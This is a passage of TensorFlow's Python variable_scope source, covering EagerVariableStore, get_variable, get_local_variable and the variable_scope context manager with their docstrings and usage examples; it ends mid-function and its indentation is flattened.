store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
      x = tf.layers.dense(input, units=1, name="l1")
  print(container.variables())  # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
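A minimal sketch of sharding with a partitioner (the scope name, shape, and
`max_partitions` value below are only illustrative):
```python
partitioner = tf.min_max_variable_partitioner(max_partitions=4)
with tf.variable_scope("embeddings", partitioner=partitioner):
  embedding = tf.get_variable("weights", shape=[100000, 64])
# `embedding` is a `PartitionedVariable`; reading it as a `Tensor` concatenates
# the shards along the partitioned (first) axis.
```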
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
    custom getter that just creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
  synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
    # Copy to avoid mutating the caller's list.
    collections = list(collections) + [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
    A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
        If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
      # Handler for the case when we jump to a shared scope. We create a new
      # VariableScope (self._cached_variable_scope_object) that contains a copy
      # of the provided shared scope, possibly with changed reuse and
      # initializer, if the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
      # Handler for the case when we just prolong the current variable scope.
      # We create a VariableScope with its name extended by the provided one,
      # and with inherited reuse and initializer (unless the user provided
      # values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
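  An illustrative sketch of that uniquification (assuming no scope named
  "block" was opened earlier):
  ```python
  with tf.variable_scope(None, default_name="block") as s1:
    pass  # s1.name == "block"
  with tf.variable_scope(None, default_name="block") as s2:
    pass  # s2.name == "block_1"
  ```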
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
  Basic example of sharing a variable with AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
  A note about name scoping: Setting `reuse` does not impact the naming of other
  ops such as `tf.multiply`. See the related discussion on
  [github#6189](https://github.com/tensorflow/tensorflow/issues/6189).
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
  A note about using variable scopes in a multi-threaded environment: Variable
  scopes are thread local, so one thread will not see another thread's current
  scope. Also, when using `default_name`, unique scope names are generated only
  on a per-thread basis. If the same name was used in a different thread, that
  does not prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
  Further, each thread starts with an empty variable scope. So if you wish to
  preserve name prefixes from the main thread's scope, you should capture the
  main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
      default_name: The default name to use if the `name_or_scope` argument is
        `None`; this name will be uniquified. If `name_or_scope` is provided,
        it won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      auxiliary_name_scope: If `True`, we create an auxiliary name scope with
        the scope. If `False`, we don't create it. Note that the argument is
        not inherited, and it only takes effect once, when the scope is
        created. You should only use it for re-entering a premade variable
        scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
      # The graph context was only entered on the graph-mode path above.
      if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
